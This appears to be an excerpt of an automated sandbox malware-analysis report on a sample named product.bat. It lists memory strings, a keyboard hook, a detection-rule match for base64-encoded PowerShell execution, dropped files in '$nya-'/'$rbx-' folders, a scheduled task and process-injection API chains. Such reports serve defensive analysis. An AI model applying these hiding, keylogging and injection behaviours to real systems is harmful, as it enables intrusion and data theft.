Source: svchost.exe, 0000001A.00000002.3406712131.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1477059978.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000001A.00000002.3410804423.000002234B513000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000010.00000000.1417007094.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3362429168.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000010.00000002.3357932105.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476780587.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405486583.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476625383.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3404973305.000002234AE13000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.26.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000001A.00000000.1476780587.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405486583.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476625383.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3408361314.000002234AEE7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476689535.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405221017.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97490.26.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 0000001A.00000000.1477287322.000002234AEEE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?7cd3bd29ccfac
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 00000012.00000000.1427635100.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3415712940.00000262ED790000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://osoft.co_2010-06X
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp, Null.35.dr, Null.12.dr | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6xG

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 8164, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: product.bat | Static file information: 7309406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2\IhrFKM.exe
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CA2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD42300 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-mW41WeM4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2\IhrFKM.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140002434
Source: C:\Windows\System32\winlogon.exe | Code function: 15_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exe | Code function: 15_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D212FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D29D894
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D292FF0
Source: C:\Windows\System32\lsass.exe | Code function: 16_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exe | Code function: 16_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exe | Code function: 16_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD52FF0
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000022F4B8F23F0
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000022F4B8FCE18
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000022F4B8FCC94
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1EB23F0
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1EBCE18
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1EBCC94
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CA2FF0
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CADA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CAD894
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D32FF0
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D3DA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D3D894
Source: C:\Windows\System32\cmd.exe | Code function: 22_3_000001B68BCFCE18
Source: C:\Windows\System32\cmd.exe | Code function: 22_3_000001B68BCFCC94
Source: C:\Windows\System32\cmd.exe | Code function: 22_3_000001B68BCF23F0
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD2DA18
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD2D894
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD22FF0
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD5DA18
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD5D894
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD52FF0
Source: C:\Windows\System32\conhost.exe | Code function: 23_3_000001E591C9CE18
Source: C:\Windows\System32\conhost.exe | Code function: 23_3_000001E591C9CC94
Source: C:\Windows\System32\conhost.exe | Code function: 23_3_000001E591C923F0
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_000001E591CCDA18
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_000001E591CCD894
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_000001E591CC2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 26_3_000002234E1023F0
Source: C:\Windows\System32\svchost.exe | Code function: 26_3_000002234E10CC94
Source: C:\Windows\System32\svchost.exe | Code function: 26_3_000002234E10CE18
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E132FF0
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E13D894
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E162FF0
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E16D894
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exe | Code function: 27_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exe | Code function: 27_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exe | Code function: 27_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe | Code function: 28_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exe | Code function: 28_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exe | Code function: 28_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exe | Code function: 29_3_000002287A7D23F0
Source: C:\Windows\System32\svchost.exe | Code function: 29_3_000002287A7DCC94
Source: C:\Windows\System32\svchost.exe | Code function: 29_3_000002287A7DCE18
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD42FF0
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD4D894
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD4DA18
Source: C:\Windows\System32\svchost.exe | Code function: 30_3_000001B94DA6CC94
Source: C:\Windows\System32\svchost.exe | Code function: 30_3_000001B94DA623F0
Source: C:\Windows\System32\svchost.exe | Code function: 30_3_000001B94DA6CE18
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001B94DA92FF0
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_3_000002520254CE18
Source: C:\Windows\System32\svchost.exe | Code function: 31_3_00000252025423F0
Source: C:\Windows\System32\svchost.exe | Code function: 31_3_000002520254CC94
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000002520257DA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000025202572FF0
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000002520257D894
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_00000252025A2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_00000252025AD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_3_000001A9EBF923F0
Source: C:\Windows\System32\svchost.exe | Code function: 32_3_000001A9EBF9CE18
Source: C:\Windows\System32\svchost.exe | Code function: 32_3_000001A9EBF9CC94
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE603A
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE6008
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFC2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5FE9
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE57B0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F8F
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F7F
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F50
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F40
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F30
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5F00
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5EF0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5EE0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5EB0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5EA0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5E90
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5DA0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5D60
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5D20
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5D10
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5C7F
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5C60
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5C10
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE59E0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5990
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5940
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE6138
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE5900
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE60FA
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE60D9
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFE6089
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC682FF0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6B2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 33_3_0000019FF160CE18
Source: C:\Windows\System32\svchost.exe | Code function: 33_3_0000019FF16023F0
Source: C:\Windows\System32\svchost.exe | Code function: 33_3_0000019FF160CC94
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF1632FF0
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19AD894
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19A2FF0
Source: Joe Sandbox View Dropped File: C:\Windows\$nya-onimai2\IhrFKM.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
Source: IhrFKM.exe.35.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2173
Source: Process Memory Space: powershell.exe PID: 8164, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exes
Source: System.evtx.36.dr Binary string: \Device\HarddiskVolume3\Windows\ImmersiveControlPanel\SystemSettings.exeX
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exer
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exee
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exec
Source: Security.evtx.36.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeProP**
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exem
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.dr Binary string: O\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe,
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.36.dr Binary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeh
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.36.dr Binary string: C:\Device\HarddiskVolume3
Source: System.evtx.36.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.36.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4ic
